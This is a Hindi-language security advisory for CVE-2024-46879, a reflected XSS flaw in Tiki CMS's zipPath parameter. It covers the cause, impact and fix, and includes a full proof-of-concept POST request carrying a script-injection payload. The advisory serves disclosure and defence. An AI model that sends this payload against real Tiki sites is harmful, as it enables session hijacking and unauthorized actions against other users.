
CVE-2024-46879 - Tiki CMS परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता
Tiki CMS - 'zipPath' पैरामीटर परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता
केवल शैक्षिक, अनुसंधान और रक्षात्मक उद्देश्यों के लिए अभिप्रेत है। बिना अनुमति के सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है।
Tiki के संस्करण 21.11 से पहले के संस्करणों में tiki-admin_system.php के POST अनुरोध डेटा zipPath में एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। यह भेद्यता हमलावरों को एक क्राफ्टेड पेलोड के माध्यम से मनमाना जावास्क्रिप्ट कोड निष्पादित करने की अनुमति देती है, जिससे संवेदनशील जानकारी तक संभावित पहुंच या अनधिकृत कार्य हो सकते हैं।
यह भेद्यता tiki-admin_system.php में zipPath पैरामीटर के अनुचित इनपुट सैनिटाइजेशन के कारण होती है। उपयोगकर्ता द्वारा प्रदान किया गया इनपुट पर्याप्त एन्कोडिंग के बिना HTTP प्रतिक्रिया में परावर्तित होता है, जिससे इंजेक्ट किए गए जावास्क्रिप्ट के निष्पादन की अनुमति मिलती है।
एक प्रमाणित हमलावर को एक क्राफ्टेड अनुरोध के माध्यम से किसी अन्य उपयोगकर्ता के ब्राउज़र में मनमाना जावास्क्रिप्ट निष्पादित करने की अनुमति देता है, जिससे संभावित रूप से सत्र अपहरण या अनधिकृत कार्य हो सकते हैं।
POST /tiki-admin_system.php HTTP/1.1
Referer: http://127.0.0.1:9080/
Cookie: wiki_plugin_edit_view=true; tabs=%40tabs_wikipages%3A2%40admin_look%3A2%40admin_general%3A3; show_details=n; preview=%40preview_diff_style%3A; local_tz=Asia%2FCalcutta; javascript_enabled=y; PHPSESSID=120ab2736ae548eda9efcd2c862ac76c; PHPSESSIDCV=JHSjEwiO2tLPDG5yIJ2DQw%3D%3D
Host: 127.0.0.1:9080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
Accept: */*
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
zipPath=%22'%3E<div%20on<svg/onmouseover="alert(document.domain)">Coldfx</div>"%20/%3E&zip=1

यह मुद्दा Tiki CMS Groupware संस्करण 21.11 में संबोधित किया गया है। उपयोगकर्ताओं को सलाह दी जाती है कि वे इस या बाद के पैच किए गए संस्करण में अपग्रेड करें।
विक्रेता संदर्भ: https://tiki.org/article515-New-Security-Update-Released-for-Tiki-21-x-LTS-and-Upgrade-is-Strongly-Recommended